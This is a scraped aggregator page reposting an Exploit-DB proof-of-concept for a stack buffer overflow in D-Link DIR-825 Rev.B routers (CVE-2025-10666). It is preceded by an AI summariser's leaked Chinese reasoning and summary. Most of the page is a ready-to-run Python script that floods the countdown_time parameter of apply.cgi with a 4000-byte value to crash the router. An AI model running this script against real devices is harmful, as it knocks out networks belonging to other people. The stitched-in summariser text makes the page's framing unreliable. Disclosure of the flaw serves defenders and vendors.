[hardware] D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。好的,我先看看这篇文章讲的是什么。 文章标题是D-Link DIR-825 Rev.B 2.10的栈溢出漏洞,导致拒绝服务。看起来这是一个安全漏洞的报告。作者是Beatriz Fresno Naumova,日期是2025年9月25日。漏洞存在于apply.cgi这个端点,通过countdown_time参数触发。PoC代码发送了一个过长的POST参数,导致进程崩溃。 我需要把重点放在漏洞的位置、触发方式以及影响上。控制在100字以内,所以要简洁明了。直接描述漏洞的存在、触发条件和结果。 总结的时候要注意用词准确,比如“栈溢出漏洞”、“countdown_time参数”、“发送过长POST请求”、“导致路由器崩溃”。这样就能在有限的字数内传达关键信息了。 </think> D-Link DIR-825 Rev.B路由器(固件版本<=2.10)中存在栈溢出漏洞,通过apply.cgi端点的countdown_time参数发送过长POST请求可触发崩溃。 2026-2-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏

# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
# Google Dork: N/A
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.dlink.com/
# Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
# Version: DIR-825 Rev.B <= 2.10
# Tested on: DIR-825 Rev.B physical hardware, local network
# CVE: CVE-2025-10666
#
# Description:
# A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
# D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
# This PoC sends an overly long POST parameter to crash the process.

import requests

TARGET = "http://192.168.0.1/apply.cgi"  # Change this to the router's IP
LENGTH = 4000                            # Adjust length for testing / fuzzing
PAYLOAD = "1" * LENGTH

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://192.168.0.1/",
}

data = {
    "countdown_time": PAYLOAD
}

try:
    print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
    r = requests.post(TARGET, headers=headers, data=data, timeout=5)
    print(f"[+] Status Code: {r.status_code}")
    print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
except Exception as e:
    print(f"[-] Failed to send exploit: {e}")
            

文章来源: https://www.exploit-db.com/exploits/52469
如有侵权请联系:admin#unsafe.sh